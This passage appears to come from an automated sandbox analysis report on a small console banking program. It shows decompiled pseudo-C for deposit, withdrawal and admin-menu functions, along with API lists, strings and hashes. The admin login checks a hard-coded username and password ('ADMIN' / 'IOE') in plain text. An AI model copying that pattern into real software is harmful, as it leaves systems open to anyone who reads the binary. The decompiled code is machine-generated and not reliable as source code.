					E012B6F06(_t131, _t175, _t176, __eflags);
					_t148 =  *0x12d2f28; // 0x0
					_push(_t148);
					E012B6DB6(_t131, _t175, _t176, __eflags);
					E012B20E0(_t148, _t175, _t176, __eflags, _t215);
					E012B12B0(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E012B715C(_t131, _t175, _t176, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L10;
				}
				return _t97;
			}

0x012b49e0
0x012b49e0
0x012b49e0
0x012b49e0
0x012b49e0
0x012b49e9
0x012b49f0
0x012b49f9
0x012b49fe
0x012b4a03
0x012b4a14
0x012b4a26
0x012b4a2b
0x012b4a2e
0x012b4a33
0x012b4a37
0x012b4a39
0x012b4a42
0x012b4a47
0x00000000
0x012b4a51
0x012b4a5d
0x012b4a68
0x012b4a69
0x012b4a6e
0x012b4a7a
0x012b4a7f
0x012b4a84
0x012b4a95
0x012b4aa7
0x012b4aac
0x012b4aaf
0x012b4ab4
0x012b4abb
0x012b4abe
0x012b4ac2
0x012b4ac6
0x012b4aca
0x012b4ad1
0x012b4ad5
0x012b4ad9
0x012b4add
0x012b4ae1
0x012b4ae8
0x012b4aef
0x012b4afc
0x012b4b02
0x012b4b07
0x012b4b0a
0x012b4b0d
0x00000000
0x00000000
0x012b4b1a
0x012b4b1f
0x012b4b22
0x012b4b24
0x012b4b26
0x012b4b2b
0x012b4b2f
0x012b4b31
0x012b4b3a
0x012b4b3f
0x012b4b47
0x012b4b4c
0x012b4b51
0x012b4b5d
0x012b4b62
0x012b4b67
0x012b4b6f
0x00000000
0x012b4b6f
0x012b4b2f
0x012b4b7b
0x012b4b80
0x012b4b85
0x012b4b86
0x012b4b8e
0x012b4b97
0x012b4b9c
0x012b4ba1
0x012b4ba6
0x012b4bab
0x012b4bb7
0x012b4bc0
0x012b4bcb
0x012b4bcf
0x012b4bdc
0x012b4beb
0x012b4bf3
0x012b4bf8
0x012b4c0b
0x012b4c1f
0x012b4c42
0x012b4c4d
0x012b4c4e
0x012b4c5a
0x012b4c5f
0x012b4c64
0x012b4c69
0x012b4c6c
0x012b4c70
0x012b4c73
0x012b4c82
0x012b4c94
0x012b4ca3
0x012b4ca8
0x012b4cab
0x012b4cb0
0x012b4cb7
0x012b4cba
0x012b4cbe
0x012b4cc2
0x012b4cc6
0x012b4ccd
0x012b4cd1
0x012b4cd5
0x012b4cd9
0x012b4cdd
0x012b4ce4
0x012b4ceb
0x012b4cf8
0x012b4cff
0x012b4d04
0x012b4d07
0x012b4d0a
0x00000000
0x00000000
0x012b4d1b
0x012b4d20
0x012b4d23
0x012b4d25
0x012b4d27
0x012b4d2c
0x012b4d31
0x012b4d31
0x012b4d36
0x012b4d3e
0x012b4d42
0x012b4d44
0x012b4d49
0x012b4d4e
0x012b4d53
0x012b4d5b
0x012b4d5b
0x012b4d60
0x012b4d65
0x012b4d6a
0x012b4d6f
0x012b4d77
0x012b4d7c
0x012b4d84
0x012b4d89
0x012b4d91
0x012b4d9a
0x012b4da1
0x012b4da6
0x012b4daa
0x012b4dae
0x012b4db2
0x012b4db9
0x012b4dc0
0x012b4dc7
0x012b4dc8
0x012b4dcd
0x012b4dd3
0x012b4dd4
0x012b4dd9
0x012b4dd9
0x012b4de1
0x012b4de6
0x012b4de7
0x012b4def
0x012b4df5
0x012b4df6
0x012b4e10
0x012b4e1a
0x012b4e22
0x012b4e27
0x012b4e2f
0x012b4e34
0x012b4e39
0x012b4e3e
0x012b4e46
0x012b4e47
0x012b4e4c
0x012b4e51
0x012b4e52
0x012b4e5a
0x012b4e60
0x012b4e61
0x012b4e69
0x012b4e72
0x012b4e77
0x00000000
0x012b4e81
0x012b4c79
0x012b4c7c
0x00000000
0x00000000
0x012b4e87

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B4A03
_wscanf.LIBCMT ref: 012B4A14

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_wprintf.LIBCMT ref: 012B4A4C

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B4A6E
_wprintf.LIBCMT ref: 012B4A84
_wscanf.LIBCMT ref: 012B4A95
_swscanf.LIBCMT ref: 012B4B02
_wprintf.LIBCMT ref: 012B4B51
_wprintf.LIBCMT ref: 012B4B67

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2152

Strings

Amount to be Withdrawn (in NRs.) : , xrefs: 012B4A7F
%s to be Withdrawn from A/C number : %s [%s], xrefs: 012B4BD7
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B4CF3
Transaction completed successfully!, xrefs: 012B4E77
TEMP.DAT, xrefs: 012B4C9E
Sorry, the current balance is Rs. %.2f only!, xrefs: 012B4B4C
Transaction NOT completed!, xrefs: 012B4B62
TRANSACTION.DAT, xrefs: 012B4E03
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 012B4C5F
Withdraw from A/C number : , xrefs: 012B49FE
ACCOUNT.DAT, xrefs: 012B4A21
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 012B4DC8
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 012B4AF7
ACCOUNT.DAT, xrefs: 012B4AA2
ACCOUNT.DAT, xrefs: 012B4C87
Confirm Transaction, xrefs: 012B4B9C
Cash+Withdrawn, xrefs: 012B4E3E
%s %s %s %s %.2f %s, xrefs: 012B4E47
[ %s ], xrefs: 012B4A69
Given A/C number does not exits!, xrefs: 012B4A47

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__fsopen__ftbuf__output_s_l__stbuf_swscanf_vwscanf
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be Withdrawn from A/C number : %s [%s]$ACCOUNT.DAT$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Withdrawn (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Withdrawn$Confirm Transaction$Given A/C number does not exits!$Sorry, the current balance is Rs. %.2f only!$TEMP.DAT$TRANSACTION.DAT$Transaction NOT completed!$Transaction completed successfully!$Withdraw from A/C number : $[ %s ]
API String ID: 427838879-2716176803
Opcode ID: ab223d644b8290b8f65995c5ea9587f491c03c89e0979869026e12f2d702b97a
Instruction ID: b1e0586d8472362199a3044c360e6e5771475ef33b7a1827b76cfd2bdb18b2d2
Opcode Fuzzy Hash: ab223d644b8290b8f65995c5ea9587f491c03c89e0979869026e12f2d702b97a
Instruction Fuzzy Hash: 71C1B7B2D3020AAFDB15EBA5DCC1EEE7378AF69740F044659F60576080F67066488FB5

Uniqueness

Uniqueness Score: -1.00%

Function 012B22F0, Relevance: 57.9, APIs: 17, Strings: 16, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E012B22F0(void* __edi, void* __esi, void* __fp0) {
				char _v5;
				char _v6;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v55;
				char _v59;
				char _v60;
				char _v92;
				void* __ebp;
				void* _t50;
				void* _t74;
				void* _t78;
				void* _t85;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t100;
				void* _t101;
				void* _t106;
				void* _t116;

				_t116 = __fp0;
				_t95 = __esi;
				_t94 = __edi;
				_v60 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v20 = 0;
				_v16 = 0;
				do {
					_v20 = 0;
					E012B12B0(7, 5);
					_push("Only THREE attempts shall be allowed to enter username and password.");
					E012B715C(_t85, _t94, _t95, 0);
					E012B1380(_t94, _t95, 0, 0xa, 8, 0x46, 0xf);
					E012B12B0(0x17, 0xa);
					_push("Enter User name : ");
					E012B715C(_t85, _t94, _t95, 0);
					E012B738B("%s",  &_v92);
					E012B12B0(0x17, 0xc);
					_push("Password        : ");
					E012B715C(_t85, _t94, _t95, 0);
					_t100 = _t96 + 0x14;
					E012B12F0(_t94, _t95,  &_v60);
					_v16 = _v16 + 1;
					_t110 = _v16 - 3;
					if(_v16 == 3) {
						E012B20E0( &_v92, _t94, _t95, _t110, _t116);
						E012B12B0(0x19, 8);
						_push(0x12cf224);
						E012B715C(_t85, _t94, _t95, _t110);
						E012B12B0(0x16, 0xb);
						_push("Press any key to exit the program...");
						E012B715C(_t85, _t94, _t95, _t110);
						_t100 = _t100 + 8;
						E012B77B1(0);
					}
					_t87 =  &_v92;
					_t50 = E012B8230( &_v92, "ADMIN");
					_t101 = _t100 + 8;
					if(_t50 != 0) {
						L6:
						E012B20E0(_t87, _t94, _t95, __eflags, _t116);
						E012B12B0(0x19, 0xa);
						_push(0x12cf278);
						E012B715C(_t85, _t94, _t95, __eflags);
						_t96 = _t101 + 4;
					} else {
						_t78 = E012B8230( &_v60, "IOE");
						_t101 = _t101 + 8;
						if(_t78 != 0) {
							goto L6;
						} else {
							_v20 = 1;
						}
					}
					_t113 = _v20 - 1;
				} while (_v20 != 1);
				do {
					E012B20E0(_t87, _t94, _t95, _t113, _t116);
					E012B12B0(0x1e, 8);
					_push("1. Add User");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0xa);
					_push("2. Delete User");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0xc);
					_push("3. Edit User name / Password");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0xe);
					_push("4. View User Log");
					E012B715C(_t85, _t94, _t95, _t113);
					E012B12B0(0x1e, 0x10);
					_push("5. Exit");
					E012B715C(_t85, _t94, _t95, _t113);
					_t106 = _t96 + 0x14;
					E012B12B0(1, 0x11);
					_v24 = 0;
					while(1) {
						_t114 = _v24 - 0x4e;
						if(_v24 >= 0x4e) {
							break;
						}
						_push("_");
						E012B715C(_t85, _t94, _t95, _t114);
						_t106 = _t106 + 4;
						_v24 = _v24 + 1;
					}
					E012B12B0(0x17, 0x13);
					_push(" Press a number between the range [1 -5]  ");
					E012B715C(_t85, _t94, _t95, __eflags);
					_t96 = _t106 + 4;
					_t89 = _v6 - 0x30;
					_v28 = _v6 - 0x30;
					_v12 = _v28;
					_v12 = _v12 - 1;
					__eflags = _v12 - 4;
					if(__eflags > 0) {
						E012B20E0(_t89, _t94, _t95, __eflags, _t116);
						E012B12B0(0xa, 0xa);
						_push("Your input is out of range! Enter a choice between 1 to 5!");
						E012B715C(_t85, _t94, _t95, __eflags);
						E012B12B0(0xf, 0xc);
						_push("Press ENTER to return to main menu...");
						_t74 = E012B715C(_t85, _t94, _t95, __eflags);
						_t96 = _t96 + 8;
					} else {
						switch( *((intOrPtr*)(_v12 * 4 +  &M012B25A8))) {
							case 0:
								_t74 = E012B25C0(_t85, _t94, _t95, _t116);
								goto L23;
							case 1:
								E012B2800(__ebx, __ecx, __edi, __esi, __fp0);
								goto L23;
							case 2:
								E012B2B10(__ebx, __edi, __esi, __fp0);
								goto L23;
							case 3:
								E012B2E80(__ebx, __edx, __eflags, __fp0);
								goto L23;
							case 4:
								E012B20E0(__ecx, __edi, __esi, __eflags, __fp0);
								E012B12B0(0xf, 0xa);
								_push("Are you sure you want to exit? <Y/N> : ");
								E012B715C(__ebx, __edi, __esi, __eflags);
								__esp = __esp + 4;
								__edx = _v5;
								__eflags = _v5 - 0x59;
								if(_v5 == 0x59) {
									L20:
									E012B77B1(0);
								} else {
									__eflags = _v5 - 0x79;
									if(_v5 == 0x79) {
										goto L20;
									}
								}
								goto L23;
						}
					}
					L23:
					_t87 = 1;
					__eflags = 1;
				} while (1 != 0);
				return _t74;
			}

0x012b22f0
0x012b22f0
0x012b22f0
0x012b22f6
0x012b22fc
0x012b22ff
0x012b2302
0x012b2305
0x012b2308
0x012b230b
0x012b230e
0x012b2311
0x012b2314
0x012b231b
0x012b2322
0x012b2322
0x012b232d
0x012b2332
0x012b2337
0x012b2347
0x012b2350
0x012b2355
0x012b235a
0x012b236b
0x012b2377
0x012b237c
0x012b2381
0x012b2386
0x012b238d
0x012b2398
0x012b239b
0x012b239f
0x012b23a1
0x012b23aa
0x012b23af
0x012b23b4
0x012b23c0
0x012b23c5
0x012b23ca
0x012b23cf
0x012b23d4
0x012b23d4
0x012b23de
0x012b23e2
0x012b23e7
0x012b23ec
0x012b240c
0x012b240c
0x012b2415
0x012b241a
0x012b241f
0x012b2424
0x012b23ee
0x012b23f7
0x012b23fc
0x012b2401
0x00000000
0x012b2403
0x012b2403
0x012b2403
0x012b2401
0x012b2427
0x012b2427
0x012b2431
0x012b2431
0x012b243a
0x012b243f
0x012b2444
0x012b2450
0x012b2455
0x012b245a
0x012b2466
0x012b246b
0x012b2470
0x012b247c
0x012b2481
0x012b2486
0x012b2492
0x012b2497
0x012b249c
0x012b24a1
0x012b24a8
0x012b24ad
0x012b24bf
0x012b24bf
0x012b24c3
0x00000000
0x00000000
0x012b24c5
0x012b24ca
0x012b24cf
0x012b24bc
0x012b24bc
0x012b24d8
0x012b24dd
0x012b24e2
0x012b24e7
0x012b24ee
0x012b24f1
0x012b24f7
0x012b2500
0x012b2503
0x012b2507
0x012b2565
0x012b256e
0x012b2573
0x012b2578
0x012b2584
0x012b2589
0x012b258e
0x012b2593
0x012b2509
0x012b250c
0x00000000
0x012b2513
0x00000000
0x00000000
0x012b251a
0x00000000
0x00000000
0x012b2521
0x00000000
0x00000000
0x012b2528
0x00000000
0x00000000
0x012b252f
0x012b2538
0x012b253d
0x012b2542
0x012b2547
0x012b254a
0x012b254e
0x012b2551
0x012b255c
0x012b255e
0x012b2553
0x012b2557
0x012b255a
0x00000000
0x00000000
0x012b255a
0x00000000
0x00000000
0x012b250c
0x012b2596
0x012b2596
0x012b259b
0x012b259b
0x012b25a6

APIs

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B2337

Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B139D
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13DB
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B13FC
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1470
Part of subcall function 012B1380: _wprintf.LIBCMT ref: 012B1493

_wprintf.LIBCMT ref: 012B235A

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wscanf.LIBCMT ref: 012B236B

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

_wprintf.LIBCMT ref: 012B2381

Part of subcall function 012B12F0: _wprintf.LIBCMT ref: 012B1329

_wprintf.LIBCMT ref: 012B23B4
_wprintf.LIBCMT ref: 012B241F

Part of subcall function 012B25C0: _wprintf.LIBCMT ref: 012B262D
Part of subcall function 012B25C0: _wscanf.LIBCMT ref: 012B263F
Part of subcall function 012B25C0: _swscanf.LIBCMT ref: 012B2681
Part of subcall function 012B25C0: _wprintf.LIBCMT ref: 012B26D1

_wprintf.LIBCMT ref: 012B23CA

Part of subcall function 012B77B1: _doexit.LIBCMT ref: 012B77BB

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2152

_wprintf.LIBCMT ref: 012B2444
_wprintf.LIBCMT ref: 012B245A
_wprintf.LIBCMT ref: 012B2470
_wprintf.LIBCMT ref: 012B2486
_wprintf.LIBCMT ref: 012B249C
_wprintf.LIBCMT ref: 012B24CA
_wprintf.LIBCMT ref: 012B24E2

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Strings

4. View User Log, xrefs: 012B2481
Are you sure you want to exit? <Y/N> : , xrefs: 012B253D
N, xrefs: 012B24BF
ADMIN, xrefs: 012B23D9
1. Add User, xrefs: 012B243F
2. Delete User, xrefs: 012B2455
Press ENTER to return to main menu..., xrefs: 012B2589
Press a number between the range [1 -5] , xrefs: 012B24DD
Password : , xrefs: 012B237C
3. Edit User name / Password, xrefs: 012B246B
Your input is out of range! Enter a choice between 1 to 5!, xrefs: 012B2573
IOE, xrefs: 012B23EE
Press any key to exit the program..., xrefs: 012B23C5
5. Exit, xrefs: 012B2497
Only THREE attempts shall be allowed to enter username and password., xrefs: 012B2332
Enter User name : , xrefs: 012B2355

Memory Dump Source

Source File: 00000004.00000002.2105071799.00000000012B1000.00000020.00020000.sdmp, Offset: 012B0000, based on PE: true

Associated: 00000004.00000002.2105062335.00000000012B0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105095151.00000000012C8000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2105118030.00000000012CF000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.2105123201.00000000012D1000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2105128963.00000000012D5000.00000002.00020000.sdmp Download File

Similarity

API ID: _wprintf$__wstrtime_wscanf$ConsoleCursorHandlePosition__ftbuf__output_s_l__stbuf_doexit_swscanf_vwscanf
String ID: Press a number between the range [1 -5] $1. Add User$2. Delete User$3. Edit User name / Password$4. View User Log$5. Exit$ADMIN$Are you sure you want to exit? <Y/N> : $Enter User name : $IOE$N$Only THREE attempts shall be allowed to enter username and password.$Password : $Press ENTER to return to main menu...$Press any key to exit the program...$Your input is out of range! Enter a choice between 1 to 5!
API String ID: 3691436685-2046970424
Opcode ID: 8e8c60288f117186501c38ef16f618e1d97d2ee09780a0e9ec4abd7406f65f28
Instruction ID: c5e9730fd3928bfd7529a1cf5468faa3e1df69ef4f4f78a04a13b92535aba0c8
Opcode Fuzzy Hash: 8e8c60288f117186501c38ef16f618e1d97d2ee09780a0e9ec4abd7406f65f28
Instruction Fuzzy Hash: BE6141B0EB0307A6EB14BBB4ADD3BEE76725F65BC0F000129EA05752C1E9B161588767

Uniqueness

Uniqueness Score: -1.00%

Function 012B4640, Relevance: 52.8, APIs: 14, Strings: 16, Instructions: 252
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E012B4640(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v280;
				char _v360;
				char _v440;
				void* __ebp;
				void* _t57;
				char _t73;
				intOrPtr _t75;
				void* _t80;
				intOrPtr _t81;
				intOrPtr _t86;
				void* _t93;
				intOrPtr _t103;
				intOrPtr _t113;
				intOrPtr _t114;
				intOrPtr _t129;
				intOrPtr _t134;
				void* _t137;
				void* _t141;
				void* _t151;
				void* _t153;
				void* _t154;
				void* _t163;

				_t170 = __fp0;
				_t168 = __eflags;
				_t136 = __esi;
				_t135 = __edi;
				_t101 = __ebx;
				_v16 = 0;
				E012B20E0(__ecx, __edi, __esi, __eflags, __fp0);
				E012B12B0(5, 0xa);
				_push("Deposit to A/C number            : ");
				E012B715C(__ebx, __edi, __esi, __eflags);
				E012B738B("%s",  &_v28);
				 *0x12d2f28 = E012B6EF1("ACCOUNT.DAT", "r");
				_t103 =  *0x12d2f28; // 0x0
				_push(_t103);
				E012B6DB6(__ebx, _t135, _t136, _t168);
				_t141 = _t137 + 0x18;
				_t169 = _v16;
				if(_v16 == 0) {
					E012B20E0(_t103, _t135, _t136, _t169, __fp0);
					E012B12B0(0x14, 0xc);
					_push("Given A/C number does not exits!");
					return E012B715C(_t101, _t135, _t136, _t169);
				}
				E012B12B0(0x32, 0xa);
				_push( &_v244);
				_push("[ %s ]");
				E012B715C(_t101, _t135, _t136, __eflags);
				E012B12B0(5, 0xc);
				_push("Amount to be Deposited (in NRs.) : ");
				E012B715C(_t101, _t135, _t136, __eflags);
				E012B738B("%f",  &_v12);
				E012B20E0(_t103, _t135, _t136, __eflags, __fp0);
				E012B12B0(0x1e, 0xa);
				_push("Confirm Transaction");
				_t57 = E012B715C(_t101, _t135, _t136, __eflags);
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E012B1870(_t57,  &_v280);
				E012B12B0(3, 0xc);
				_push( &_v244);
				_push( &_v28);
				E012B715C(_t101, _t135, _t136, __eflags);
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E012B1B30( &_v440, "%s to be deposited in A/C number : %s [ %s ]",  &_v280);
				E012B8140( &_v360,  &_v440);
				E012B8140( &_v360, "]");
				E012B12B0(0x28 - (E012B82C0( &_v360) >> 1), 0xe);
				_push( &_v360);
				E012B7229(_t101, _t135, _t136, __eflags);
				E012B12B0(8, 0x11);
				_push("Are you sure you want to perform this tranasction? <Y/N>");
				E012B715C(_t101, _t135, _t136, __eflags);
				_t151 = _t141 + 0x24 - 8 + 0x1c;
				_t73 = _v5;
				__eflags = _t73 - 0x59;
				if(_t73 == 0x59) {
					L4:
					 *0x12d2f28 = E012B6EF1("ACCOUNT.DAT", "r");
					_t75 = E012B6EF1("TEMP.DAT", "a");
					_t153 = _t151 + 0x10;
					 *0x12d2f24 = _t75;
					while(1) {
						_push( &_v32);
						_push( &_v36);
						_push( &_v40);
						_push( &_v42);
						_push( &_v140);
						_push( &_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_t129 =  *0x12d2f28; // 0x0
						_t80 = E012B7021(_t129, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208);
						_t154 = _t153 + 0x38;
						__eflags = _t80 - 0xffffffff;
						if(__eflags == 0) {
							break;
						}
						_t93 = E012B8230( &_v208,  &_v28);
						_t163 = _t154 + 8;
						__eflags = _t93;
						if(__eflags == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("addss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_push("%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t134 =  *0x12d2f24; // 0x0
						_push(_t134);
						E012B6F06(_t101, _t135, _t136, __eflags);
						_t153 = _t163 - 0xfffffffffffffff8 + 0x44;
					}
					_t81 =  *0x12d2f24; // 0x0
					_push(_t81);
					E012B6DB6(_t101, _t135, _t136, __eflags);
					_t113 =  *0x12d2f28; // 0x0
					_push(_t113);
					E012B6DB6(_t101, _t135, _t136, __eflags);
					 *0x12d2f28 = E012B6EF1("TRANSACTION.DAT", "a");
					E012B8417(__eflags, 0x12d2f30);
					_push(0x12d2ee4);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0x12d2f30);
					_push(0x12d2f40);
					_push("Cash+Deposited");
					_push( &_v28);
					_push("%s %s %s %s %.2f %s\n");
					_t86 =  *0x12d2f28; // 0x0
					_push(_t86);
					E012B6F06(_t101, _t135, _t136, __eflags);
					_t114 =  *0x12d2f28; // 0x0
					_push(_t114);
					E012B6DB6(_t101, _t135, _t136, __eflags);
					E012B20E0(_t114, _t135, _t136, __eflags, _t170);
					E012B12B0(0x14, 0xc);
					_push("Transaction completed successfully!");
					return E012B715C(_t101, _t135, _t136, __eflags);
				}
				__eflags = _v5 - 0x79;
				if(_v5 == 0x79) {
					goto L4;
				}
				return _t73;
			}

0x012b4640
0x012b4640
0x012b4640
0x012b4640
0x012b4640
0x012b4649
0x012b4650
0x012b4659
0x012b465e
0x012b4663
0x012b4674
0x012b468e
0x012b4693
0x012b4699
0x012b469a
0x012b469f
0x012b46a2
0x012b46a6
0x012b46a8
0x012b46b1
0x012b46b6
0x00000000
0x012b46c0
0x012b46cc
0x012b46d7
0x012b46d8
0x012b46dd
0x012b46e9
0x012b46ee
0x012b46f3
0x012b4704
0x012b470c
0x012b4715
0x012b471a
0x012b471f
0x012b4724
0x012b4729
0x012b4735
0x012b473e
0x012b4749
0x012b474d
0x012b475a
0x012b4769
0x012b4771
0x012b4776
0x012b4789
0x012b479d
0x012b47c0
0x012b47cb
0x012b47cc
0x012b47d8
0x012b47dd
0x012b47e2
0x012b47e7
0x012b47ea
0x012b47ee
0x012b47f1
0x012b4800
0x012b4812
0x012b4821
0x012b4826
0x012b4829
0x012b482e
0x012b4831
0x012b4835
0x012b4839
0x012b483d
0x012b4844
0x012b4848
0x012b484c
0x012b4850
0x012b4854
0x012b485b
0x012b4862
0x012b486f
0x012b4876
0x012b487b
0x012b487e
0x012b4881
0x00000000
0x00000000
0x012b4892
0x012b4897
0x012b489a
0x012b489c
0x012b489e
0x012b48a3
0x012b48a8
0x012b48a8
0x012b48ad
0x012b48b2
0x012b48b7
0x012b48bc
0x012b48c4
0x012b48c9
0x012b48d1
0x012b48d6
0x012b48de
0x012b48e7
0x012b48ee
0x012b48f3
0x012b48f7
0x012b48fb
0x012b48ff
0x012b4906
0x012b490d
0x012b4914
0x012b4915
0x012b491a
0x012b4920
0x012b4921
0x012b4926
0x012b4926
0x012b492e
0x012b4933
0x012b4934
0x012b493c
0x012b4942
0x012b4943
0x012b495d
0x012b4967
0x012b496f
0x012b4974
0x012b497c
0x012b4981
0x012b4986
0x012b498b
0x012b4993
0x012b4994
0x012b4999
0x012b499e
0x012b499f
0x012b49a7
0x012b49ad
0x012b49ae
0x012b49b6
0x012b49bf
0x012b49c4
0x00000000
0x012b49ce
0x012b47f7
0x012b47fa
0x00000000
0x00000000
0x012b49d4

APIs

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B20FF
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B213E
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B215F
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B216C
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2188
Part of subcall function 012B20E0: __wstrtime.LIBCMT ref: 012B2195
Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B21C8

Part of subcall function 012B12B0: GetStdHandle.KERNEL32(000000F5,00000000,?,012B1393,?,?,?,012B122E), ref: 012B12D1
Part of subcall function 012B12B0: SetConsoleCursorPosition.KERNEL32 ref: 012B12D8

_wprintf.LIBCMT ref: 012B4663
_wscanf.LIBCMT ref: 012B4674

Part of subcall function 012B738B: _vwscanf.LIBCMT ref: 012B739C

Part of subcall function 012B6EF1: __fsopen.LIBCMT ref: 012B6EFC

_wprintf.LIBCMT ref: 012B46BB

Part of subcall function 012B715C: __stbuf.LIBCMT ref: 012B71A8
Part of subcall function 012B715C: __output_s_l.LIBCMT ref: 012B71C2
Part of subcall function 012B715C: __ftbuf.LIBCMT ref: 012B71D6

_wprintf.LIBCMT ref: 012B46DD
_wprintf.LIBCMT ref: 012B46F3
_wscanf.LIBCMT ref: 012B4704
_wprintf.LIBCMT ref: 012B471F
_wprintf.LIBCMT ref: 012B475A
_wprintf.LIBCMT ref: 012B47E2

Part of subcall function 012B20E0: _wprintf.LIBCMT ref: 012B2152

Strings

